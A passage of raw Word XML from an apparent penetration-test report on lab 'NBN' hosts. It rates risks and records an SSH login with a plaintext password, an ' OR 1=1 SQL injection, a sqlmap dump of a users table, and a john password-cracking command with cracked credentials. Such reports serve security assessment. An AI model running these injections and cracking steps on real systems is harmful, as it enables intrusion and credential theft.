              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
            <w:r w:rsidR="1D8F7EFF" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (10/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="00377F55" w14:textId="77777777" w:rsidTr="1D8F7EFF">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7BFB83E9" w14:textId="16557DF6" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploitation Likelihood</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B7256AD" w14:textId="4B3757C9" w:rsidR="1D8F7EFF" w:rsidRDefault="00201CBD" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="2289E8C7" w14:textId="77777777" w:rsidTr="1D8F7EFF">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79AFE920" w14:textId="1A9AB739" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Business Impact</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7AECC290" w14:textId="46BCEAC6" w:rsidR="1D8F7EFF" w:rsidRDefault="00201CBD" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="264C0F0A" w14:textId="77777777" w:rsidTr="1D8F7EFF">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1C71D42B" w14:textId="145D9EDA" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remediation Difficulty</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4720F3D5" w14:textId="0B2A077B" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2388606B" w14:textId="74910E1F" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4296A349" w14:textId="7B4B684B" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D86C0" w14:textId="101B867B" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Due to the scope of the attack restricting the installation of 3</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> party tools onto the NBN Server. A simple port scanning script was written onto the NBN server to scan the NBN client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D4F0D" w14:textId="1D68D0CA" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653CB9E1" wp14:editId="065C2316">
            <wp:extent cx="4107619" cy="1869886"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="942275789" name="Picture 9422757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07619" cy="1869886"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D41186" w14:textId="0DBD5A94" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Port scanning scrip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B05BC" w14:textId="5C7B6F01" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the script, the following ports were identified on the client. All the ports were connected to test for the service being ran on that server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746A6D8" w14:textId="77777777" w:rsidR="00B94233" w:rsidRDefault="00B94233" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6042AA27" w14:textId="5B13F263" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Via the SSH service provided on port 22, a connection to the server was made via the following command: </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidRPr="1D8F7EFF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>stephenson@172.16.1.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">pizzadeliver </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>as the password, the connection successfully authenticated, and provided the shell for</w:t>
      </w:r>
      <w:r w:rsidR="2CCCBD06" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> stephenson. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04854E6C" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B0EB33" w14:textId="67CE6BA6" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – SQL injection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="6345"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E247F9" w14:paraId="5C754CB2" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="934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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="263BBAAD" w14:textId="76C8B86A" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E247F9" w14:paraId="1B1F5699" w14:textId="77777777" w:rsidTr="008F62ED">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1B0C3E4E" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploitation Likelihood</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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FBEF08E" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E247F9" w14:paraId="71CF98B8" w14:textId="77777777" w:rsidTr="008F62ED">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1C49EB59" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Business Impact</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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AD67EE9" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E247F9" w14:paraId="1A43568D" w14:textId="77777777" w:rsidTr="008F62ED">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300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CCCCC"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4422B026" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01CC6B77" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="245C1A0C" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5FF906" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E16401" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection was only found on the staging server. The vulnerability was initially found after entering </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ OR 1=1 </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">into the username field. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C6218D" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812F92">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40AF1882" wp14:editId="184C1755">
            <wp:extent cx="5964307" cy="3440309"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="27305"/>
            <wp:docPr id="1898063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63361" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5987422" cy="3453642"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101F7FC" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 4</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Successful SQL injection attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53936F9D" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2DB78B" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Once the vulnerability was recorded, SQL Map was used to rapidly exfiltrate and dump out all the contents of the database. The “user” table was targeted as that contained sensitive employee login credentials. The command that was used was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E743B6" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sqlmap "</w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidRPr="1D8F7EFF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>http://10.10.0.66:8001/login.php?username=w&amp;password=w&amp;Login=Enter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" -D nbn -T users –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D6C65" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A27E521" wp14:editId="278E073F">
            <wp:extent cx="6102626" cy="1388151"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="325706120" name="Picture 325706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r="22073" b="7826"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6134781" cy="1395465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 4</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: SQLMap results of user table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D418E9" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CC81A7" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">There were two entries that were shown via SQLMap, </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">gibson </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>stephenson</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. SQLmap was able to crack the hashed password for gibson to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>digital</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> but was unable to crack the password for stephenson. So, john was used to crack the password for stephenson via the </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">rockyou.txt wordlist. The command that was entered to do so was: </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>john –format=raw-md5 –wordlist=~/Desktop/rockyou.txt hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796C9CB" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB8B0B7" wp14:editId="5E601221">
            <wp:extent cx="5943600" cy="1165338"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="588096503" name="Picture 58809650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15624"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1165338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
